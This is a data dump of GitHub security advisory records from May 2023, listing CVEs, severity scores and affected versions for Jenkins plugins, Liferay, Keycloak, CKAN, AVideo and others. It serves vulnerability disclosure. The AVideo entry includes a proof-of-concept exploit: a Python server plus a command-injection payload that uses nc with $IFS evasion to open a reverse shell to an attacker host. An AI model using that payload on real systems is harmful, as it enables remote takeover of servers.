[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:testng-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '730.732.v959a'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32984'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3047'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:06:59Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-prj5-2g2p-x2mw
|
2023-05-10T12:50:01Z
|
2023-05-09T12:30:22Z
| null |
['CVE-2023-2591']
|
teampass vulnerable to code injection
|
In nilsteampassnet/teampass prior to 3.0.7, if two users have the same folder access, malicious users can create an item where its label field is vulnerable to HTML injection. When other users see that item, it may force them to redirect to the attacker's website or capture their data using a form. The issue is fixed in version 3.0.7.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.7'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2591'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/57a977c6323656e5dc06ab5c227e75c3465a1a4a'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/TeamPass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/705f79f4-f5e3-41d7-82a5-f00441cd984b'}]
|
{'cwe_ids': ['CWE-79', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-10T12:50:01Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-mjmf-7wjw-f5xx
|
2023-05-17T17:07:24Z
|
2023-05-16T21:30:22Z
| null |
['CVE-2023-2631']
|
Jenkins Code Dx Plugin missing permission checks
|
Jenkins Code Dx Plugin 3.1.0 and earlier does not perform permission checks in several HTTP endpoints.
This allows attackers with Overall/Read permission to connect to an attacker-specified URL.
Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.
Code Dx Plugin 4.0.0 requires POST requests and the appropriate permissions for the affected HTTP endpoints.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:codedx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2631'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3118'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T17:07:24Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-wvhw-5m89-64gv
|
2023-05-24T18:04:19Z
|
2023-05-24T15:30:27Z
| null |
['CVE-2023-33938']
|
Cross-site scripting in Liferay Portal
|
Cross-site scripting (XSS) vulnerability in the App Builder module's custom object details page in Liferay Portal 7.3.0 through 7.4.0, and Liferay DXP 7.3 before update 14 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into an App Builder custom object's `Name` field.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.liferay.portal:release.portal.bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.3.0'}, {'fixed': '7.4.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33938'}, {'type': 'PACKAGE', 'url': 'https://github.com/liferay/liferay-portal'}, {'type': 'WEB', 'url': 'https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2023-33938'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T18:04:19Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-c892-cwq6-qrqf
|
2023-06-30T20:30:22Z
|
2023-05-26T18:30:21Z
|
2023-06-30T20:30:22Z
|
[]
|
Duplicate Advisory: Keycloak vulnerable to untrusted certificate validation
|
## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-5cc8-pgp5-7mpm. This link is maintained to preserve external references.
## Original Advisory
A flaw was found in Keycloak. This flaw depends on a non-default configuration "Revalidate Client Certificate" to be enabled and the reverse proxy is not validating the certificate before Keycloak. Using this method an attacker may choose the certificate which will be validated by the server. If this happens and the KC_SPI_TRUSTSTORE_FILE_FILE variable is missing/misconfigured, any trustfile may be accepted with the logging information of "Cannot validate client certificate trust: Truststore not available". This may not impact availability as the attacker would have no access to the server, but consumer applications Integrity or Confidentiality may be impacted considering a possible access to them. Considering the environment is correctly set to use "Revalidate Client Certificate" this flaw is avoidable.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '21.1.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1664'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2023-1664'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2182196&comment#0'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}]
|
{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-26T21:24:14Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-chrc-q6v3-jfv8
|
2023-05-24T21:56:12Z
|
2023-05-24T18:30:26Z
| null |
['CVE-2023-33950']
|
Liferay Portal has Inefficient Regular Expression
|
Pattern Redirects in Liferay Portal 7.4.3.48 through 7.4.3.76, and Liferay DXP 7.4 update 48 through 76 allows regular expressions that are vulnerable to ReDoS attacks to be used as patterns, which allows remote attackers to consume an excessive amount of server resources via crafted request URLs.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.liferay.portal:release.portal.bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.4.3.48'}, {'fixed': '7.4.3.77'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33950'}, {'type': 'PACKAGE', 'url': 'https://github.com/liferay/liferay-portal'}, {'type': 'WEB', 'url': 'https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2023-33950'}]
|
{'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T21:56:12Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-9mmj-64jh-ph9c
|
2023-06-06T17:17:54Z
|
2023-05-26T18:30:21Z
| null |
['CVE-2023-33779']
|
Privilege escalation in XXL-Job
|
A lateral privilege escalation vulnerability in XXL-Job v2.4.1 allows users to execute arbitrary commands on another user's account via a crafted POST request to the component `/jobinfo/`.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.xuxueli:xxl-job'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.4.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33779'}, {'type': 'WEB', 'url': 'https://github.com/silence-silence/xxl-job-lateral-privilege-escalation-vulnerability-/blob/main/README.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/xuxueli/xxl-job'}, {'type': 'WEB', 'url': 'http://xxl-job.com'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-26T21:10:01Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-5gj6-62g7-vmgf
|
2023-05-26T17:56:13Z
|
2023-05-22T03:30:16Z
| null |
['CVE-2023-33264']
|
Hazelcast vulnerable to unmasked password exposure
|
In Hazelcast before 5.3.0, configuration routines don't mask passwords in the member configuration properly. This allows Hazelcast Management Center users to view some of the secrets.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.hazelcast:hazelcast'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33264'}, {'type': 'WEB', 'url': 'https://github.com/hazelcast/hazelcast/pull/24266'}, {'type': 'WEB', 'url': 'https://github.com/hazelcast/hazelcast/pull/24266/commits/80a502d53cc48bf895711ab55f95e3a51e344ac1'}, {'type': 'WEB', 'url': 'https://github.com/hazelcast/hazelcast/commit/74eed86c2b2b727148c442e98a01d0ca6941a49e'}, {'type': 'PACKAGE', 'url': 'https://github.com/hazelcast/hazelcast'}]
|
{'cwe_ids': ['CWE-200', 'CWE-522'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-22T19:55:38Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-446m-hmmm-hm8m
|
2023-05-29T16:12:22Z
|
2023-05-24T17:24:56Z
| null |
['CVE-2023-32321']
|
Ckan remote code execution and private information access via crafted resource ids
|
Specific vulnerabilities:
* Arbitrary file write in `resource_create` and `package_update` actions, using the `ResourceUploader` object. Also reachable via `package_create`, `package_revise`, and `package_patch` via calls to `package_update`.
* Remote code execution via unsafe pickle loading, via Beaker's session store when configured to use the file session store backend.
* Potential DOS due to lack of a length check on the resource id.
* Information disclosure: A user with permission to create a resource can access any other resource on the system if they know the id, even if they don't have access to it.
* Resource overwrite: A user with permission to create a resource can overwrite any resource if they know the id, even if they don't have access to it.
### Impact
A user with permissions to create or edit a dataset can upload a resource with a specially crafted id to write the uploaded file in an arbitrary location. This can be leveraged to Remote Code Execution via Beaker's insecure pickle loading.
### Patches
All the above listed vulnerabilities have been fixed in CKAN 2.9.9 and CKAN 2.10.1
The patches for CKAN 2.9 should apply easily to previous CKAN versions.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'ckan'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.9'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ckan'}, 'versions': ['2.10.0']}]
|
[{'type': 'WEB', 'url': 'https://github.com/ckan/ckan/security/advisories/GHSA-446m-hmmm-hm8m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32321'}, {'type': 'PACKAGE', 'url': 'https://github.com/ckan/ckan'}, {'type': 'WEB', 'url': 'https://github.com/ckan/ckan/blob/2a6080e61d5601fa0e2a0317afd6a8e9b7abf6dd/CHANGELOG.rst'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T17:24:56Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-2868-ff44-43qv
|
2023-06-03T00:06:03Z
|
2023-05-24T18:30:26Z
| null |
['CVE-2023-33946']
|
Liferay portal unauthorized access to objects via OAuth 2 scope
|
The Object module in Liferay Portal 7.4.3.4 through 7.4.3.48, and Liferay DXP 7.4 before update 49 does properly isolate objects in difference virtual instances, which allows remote authenticated users in one virtual instance to view objects in a different virtual instance via OAuth 2 scope administration page.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.liferay.portal:release.portal.bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.4.3.4'}, {'fixed': '7.4.3.49'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33946'}, {'type': 'PACKAGE', 'url': 'https://github.com/liferay/liferay-portal'}, {'type': 'WEB', 'url': 'https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2023-33946'}]
|
{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T21:52:53Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-xw6j-mq6v-pmv6
|
2023-05-17T02:42:50Z
|
2023-05-16T18:30:16Z
| null |
['CVE-2023-32991']
|
Jenkins SAML Single Sign On(SSO) Plugin Cross-Site Request Forgery vulnerability
|
Jenkins SAML Single Sign On(SSO) Plugin 2.0.2 and earlier does not perform permission checks in multiple HTTP endpoints.
This allows attackers with Overall/Read permission to send an HTTP request to an attacker-specified URL and parse the response as XML, or parse a local file on the Jenkins controller as XML.
As the plugin does not configure its XML parser to prevent XML external entity (XXE) attacks, attackers can have Jenkins parse a crafted XML response that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.
Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.
SAML Single Sign On(SSO) Plugin 2.1.0 requires POST requests and Overall/Administer permission for the affected HTTP endpoints.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:miniorange-saml-sp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32991'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-2993'}]
|
{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T02:42:50Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-2mhh-27v7-3vcx
|
2023-05-12T20:20:39Z
|
2023-05-12T20:20:39Z
| null |
['CVE-2023-32073']
|
WWBN AVideo command injection vulnerability
|
# WWBN AVideo Authenticated RCE
A command injection vulnerability exists at `plugin/CloneSite/cloneClient.json.php` which allows Remote Code Execution if you CloneSite Plugin. This is a bypass to the fix for [CVE-2023-30854](https://cve.report/CVE-2023-30854) which affects WWBN Avideo up to version 12.3
## Vulnerable Code
/plugin/CloneSite/cloneClient.json.php
```php
$json->sqlFile = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->sqlFile));
$json->videoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->videoFiles));
$json->photoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->photoFiles));
// get dump file
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);
```
The `$objClone->cloneSiteURL` is not properly sanitized.
## Exploit Proof-of-Concept
avidexploit.py
```python
from http.server import BaseHTTPRequestHandler, HTTPServer
import time
hostName = "localhost"
serverPort = 8080
class MyServer(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes("{\"error\":false,\"msg\":\"\",\"url\":\"https:\/\/attacker.com/\/\",\"key\":\"2d6db3c09e41a9c27dbc72aecc4a6fc0\",\"useRsync\":1,\"videosDir\":\"\/var\/www\/html\/demo.avideo.com\/videos\/\",\"sqlFile\":\"Clone_mysqlDump_644ab263e62d6.sql\",\"videoFiles\":[],\"photoFiles\":[]}", "utf-8"))
if __name__ == "__main__":
webServer = HTTPServer((hostName, serverPort), MyServer)
print("Server started http://%s:%s" % (hostName, serverPort))
try:
webServer.serve_forever()
except KeyboardInterrupt:
pass
webServer.server_close()
print("Server stopped.")
```
Run in command line
```bash
$ python3 avidexploit.py &
$ ngrok tcp 8080 # optional if not running in VPS
```
- Then get your public facing IP and Port. Enter a cloneSiteURL like the following then hit clone to achieve command injection
```bash
http://2.tcp.ngrok.io:14599/;nc$IFS'ATTACKER.COM'$IFS'5555'$IFS-e$IFS/bin/sh;#
```
**It is important to not use white spaces for the exploit to work. Replace whitespace with `$IFS` when adding arguments to your RCE**

## Credits
- JM Sanchez
- [https://www.linkedin.com/in/juanmarcosanchez/](https://www.linkedin.com/in/juanmarcosanchez/)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'wwbn/avideo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '12.4'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/WWBN/AVideo/security/advisories/GHSA-2mhh-27v7-3vcx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32073'}, {'type': 'WEB', 'url': 'https://github.com/WWBN/AVideo/commit/1df4af01f80d56ff2c4c43b89d0bac151e7fb6e3'}, {'type': 'PACKAGE', 'url': 'https://github.com/WWBN/AVideo'}]
|
{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-12T20:20:39Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-93xx-cvmc-9w3v
|
2023-05-09T19:58:47Z
|
2023-05-09T19:58:47Z
| null |
['CVE-2023-30840']
|
On a compromised node, the fluid-csi service account can be used to modify node specs
|
### Impact
If a malicious user gains control of a Kubernetes node running fluid csi pod (controlled by the `csi-nodeplugin-fluid` node-daemonset), he/she can leverage the fluid-csi service account to modify specs of all the nodes in the cluster. However, since this service account lacks "list node" permissions, the attacker may need to use other techniques to identify vulnerable nodes.
Once the attacker identifies and modifies the node specs, he/she can manipulate system-level-privileged components to access all secrets in the cluster or execute pods on other nodes. This allows he/she to elevate privileges beyond the compromised node and potentially gain full privileged access to the whole cluster.
To exploit this vulnerability, the attacker can make all other nodes unschedulable (for example, patch node with taints) and wait for system-critical components with high privilege to appear on the compromised node. However, this attack requires two prerequisites: a compromised node and identifying all vulnerable nodes through other means. Additionally, since the attack is passive and requires patience and luck, the severity of this finding is considered medium.
### Patches
For users who're using version < 0.8.6, >= 0.7.0, upgrade to v0.8.6.
### Workarounds
Delete the `csi-nodeplugin-fluid` daemonset in `fluid-system` namespace and avoid using CSI mode to mount FUSE file systems. Alternatively using sidecar mode to mount FUSE file systems is recommended. Refer to [the doc](https://github.com/fluid-cloudnative/fluid/blob/master/docs/en/samples/knative.md) to get a full example of how to use sidecar mode.
### References
Fixed by [Fix rbacs and limit CSI Plugin's node related access](https://github.com/fluid-cloudnative/fluid/commit/77c8110a3d1ec077ae2bce6bd88d296505db1550)
### Credits
Special thanks to the discoverers of this issue:
Nanzi Yang ([nzyang@stu.xidian.edu.cn](mailto:nzyang@stu.xidian.edu.cn))
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/fluid-cloudnative/fluid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.0'}, {'fixed': '0.8.6'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/fluid-cloudnative/fluid/security/advisories/GHSA-93xx-cvmc-9w3v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30840'}, {'type': 'WEB', 'url': 'https://github.com/fluid-cloudnative/fluid/commit/77c8110a3d1ec077ae2bce6bd88d296505db1550'}, {'type': 'WEB', 'url': 'https://github.com/fluid-cloudnative/fluid/commit/91c05c32db131997b5ca065e869c9918a125c149'}, {'type': 'PACKAGE', 'url': 'https://github.com/fluid-cloudnative/fluid'}, {'type': 'WEB', 'url': 'https://github.com/fluid-cloudnative/fluid/releases/tag/v0.8.6'}]
|
{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-09T19:58:47Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-wv99-wmpf-jrqr
|
2023-05-24T18:04:41Z
|
2023-05-24T15:30:27Z
| null |
['CVE-2023-33942']
|
Cross-site scripting in Liferay Portal
|
Cross-site scripting (XSS) vulnerability in the Web Content Display widget's article selector in Liferay Liferay Portal 7.4.3.50, and Liferay DXP 7.4 update 50 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a web content article's `Title` field.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.liferay.portal:release.portal.bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.4.3.50'}, {'fixed': '7.4.3.51'}]}], 'versions': ['7.4.3.50']}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33942'}, {'type': 'PACKAGE', 'url': 'https://github.com/liferay/liferay-portal'}, {'type': 'WEB', 'url': 'https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2023-33942'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T18:04:41Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-x7fr-pg8f-93f5
|
2023-05-30T20:06:02Z
|
2023-05-30T20:06:02Z
| null |
['CVE-2023-1521']
|
sccache vulnerable to privilege escalation if server is run as root
|
### Impact
On Linux the `sccache` client can execute arbitrary code with the privileges of a local `sccache` server, by preloading the code in a shared library passed to `LD_PRELOAD`.
If the server is run as root (which is the default when installing the [snap package](https://snapcraft.io/sccache)), this means a user running the `sccache` client can get root privileges.
### Patches
Upgrade to 0.4.0
### Workarounds
Don't run sccache server as root.
### GitHub Security Lab number
GHSL-2023-046
|
[]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'sccache'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/mozilla/sccache/security/advisories/GHSA-x7fr-pg8f-93f5'}, {'type': 'PACKAGE', 'url': 'https://github.com/mozilla/sccache'}, {'type': 'WEB', 'url': 'https://github.com/mozilla/sccache/releases/tag/v0.4.0'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-30T20:06:02Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-3xf9-pgc2-mr9c
|
2023-05-17T03:32:33Z
|
2023-05-16T18:30:16Z
| null |
['CVE-2023-32992']
|
Jenkins SAML Single Sign On(SSO) Plugin missing permission checks
|
Jenkins SAML Single Sign On(SSO) Plugin 2.0.2 and earlier does not perform permission checks in multiple HTTP endpoints.
This allows attackers with Overall/Read permission to send an HTTP request to an attacker-specified URL and parse the response as XML, or parse a local file on the Jenkins controller as XML.
As the plugin does not configure its XML parser to prevent XML external entity (XXE) attacks, attackers can have Jenkins parse a crafted XML response that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.
Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.
SAML Single Sign On(SSO) Plugin 2.1.0 requires POST requests and Overall/Administer permission for the affected HTTP endpoints.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:miniorange-saml-sp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32992'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-2993'}]
|
{'cwe_ids': ['CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:32:33Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-rv6g-3v76-cvf9
|
2023-05-17T03:30:10Z
|
2023-05-16T18:30:16Z
| null |
['CVE-2023-32990']
|
Jenkins Azure VM Agents Plugin missing permission checks
|
Jenkins Azure VM Agents Plugin 852.v8d35f0960a_43 and earlier does not perform permission checks in several HTTP endpoints.
This allows attackers with Overall/Read permission to connect to an attacker-specified Azure Cloud server using attacker-specified credentials IDs obtained through another method.
Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.
Azure VM Agents Plugin 853.v4a_1a_dd947520 requires POST requests and the appropriate permissions for the affected HTTP endpoints.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:azure-vm-agents'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '853.v4a'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32990'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-2855%20(2)'}]
|
{'cwe_ids': ['CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:30:10Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-mg5h-f3q8-c96g
|
2023-05-22T21:30:42Z
|
2023-05-12T09:30:14Z
| null |
['CVE-2023-29246']
|
Apache OpenMeetings vulnerable to remote code execution via null-bye injection
|
An attacker who has gained access to an admin account can perform RCE via null-byte injection
Vendor: The Apache Software Foundation
Versions Affected: Apache OpenMeetings from 2.0.0 before 7.1.0
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.openmeetings:openmeetings-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '7.1.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29246'}, {'type': 'WEB', 'url': 'https://github.com/apache/openmeetings/commit/8e65a1344157b2898f2922d49a0bd2105687c4a5'}, {'type': 'WEB', 'url': 'https://github.com/apache/openmeetings/commit/9f12a48994d0ad741ac140c52cbd2152f0d048d5'}, {'type': 'WEB', 'url': 'https://github.com/apache/openmeetings/commit/f91ff1917027625f066a9007694a31d06e69df3a'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/openmeetings'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/OPENMEETINGS-2765'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/230plvhbdx26m43b0sy942wlwt6kkmmr'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-12T20:18:22Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-6987-xccv-fhjp
|
2023-05-17T02:59:30Z
|
2023-05-16T18:30:16Z
| null |
['CVE-2023-32981']
|
Jenkins Pipeline Utility Steps Plugin arbitrary file write vulnerability
|
Jenkins Pipeline Utility Steps Plugin provides the `untar` and `unzip` Pipeline steps to extract archives into job workspaces.
Pipeline Utility Steps Plugin 2.15.2 and earlier does not validate or limit file paths of files contained within these archives.
This allows attackers able to provide crafted archives as parameters to create or replace arbitrary files on the agent file system with attacker-specified content.
Pipeline Utility Steps Plugin 2.15.3 rejects extraction of files in `tar` and `zip` archives that would be placed outside the expected destination directory.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:pipeline-utility-steps'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.15.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32981'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-2196'}]
|
